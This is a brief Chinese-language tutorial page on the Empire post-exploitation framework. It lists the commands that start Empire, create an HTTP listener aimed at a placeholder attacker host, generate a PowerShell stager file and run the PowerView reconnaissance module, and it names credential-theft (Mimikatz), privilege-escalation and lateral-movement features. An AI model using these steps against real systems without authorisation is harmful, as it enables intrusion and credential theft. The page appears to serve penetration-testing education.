Empire

Empire

Empire 是一款基于 PowerShell 和 Python 的后渗透框架，提供强大的后渗透攻击能力。

基础使用

启动 Empire

./empire --server
./empire --client

创建 Listener

uselistener http
set Name http_listener
set Host http://x.x.x.x
execute

生成 Stager

usestager powershell/multi
set Listener http_listener
set OutFile payload.ps1
generate

模块使用

usemodule situational_awareness/network/powerview
execute

功能特性

• PowerShell 核心 - 基于 PowerShell 的后渗透
• 模块化设计 - 丰富的功能模块
• 多种 Listener - HTTP、HTTPS、DNS 等
• Python 支持 - 跨平台 Python Agent

主要模块

• 权限提升 - 本地提权模块
• 凭证窃取 - Mimikatz 集成
• 网络侦察 - 域环境侦察
• 横向移动 - 内网渗透

技术特点

• 基于 PowerShell 和 Python
• 支持多种传输协议
• 内置混淆功能
• 丰富的后渗透模块

参考资源

• Empire 文档
• Empire GitHub